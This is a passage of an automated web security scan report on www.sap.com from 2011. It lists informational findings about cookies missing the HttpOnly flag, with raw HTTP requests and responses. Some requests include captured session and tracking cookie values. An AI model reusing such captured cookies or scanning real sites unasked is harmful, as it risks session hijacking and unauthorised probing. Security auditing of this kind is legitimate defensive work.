Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:52 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.98. http://www.sap.com/solutions/sap-crystal-solutions/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/sap-crystal-solutions/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/sap-crystal-solutions/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59464
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.99. http://www.sap.com/solutions/sme.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/sme.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/sme.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25281
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:51 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:51 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:51 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.100. http://www.sap.com/text/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /text/sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /text/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33792
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:44 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.101. http://www.sap.com/text/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /text/zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /text/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33720
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.102. http://www.sap.com/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zzzzzz=yyyyy?_=1318688469563 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.sap.com/country-selector.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688530|session#1318688461599-607633#1318690330

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 32995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.103. https://www.sap.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Location: /errorpage.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:25 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/errorpage.epx">here</a>.</h2>
</body></html>
12.104. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 439
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS

{"method":"TrackInteraction","arguments":["https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1","http://store.businessobj
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:19 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:19 GMT

12.105. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; domain=.sap.com; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:10 GMT
Content-Length: 149165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
12.106. https://www.sap.com/contactsap/contact_warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/contact_warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:31 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
12.107. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactsap/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
12.108. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.109. https://www.sap.com/omni.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /omni.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /omni.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
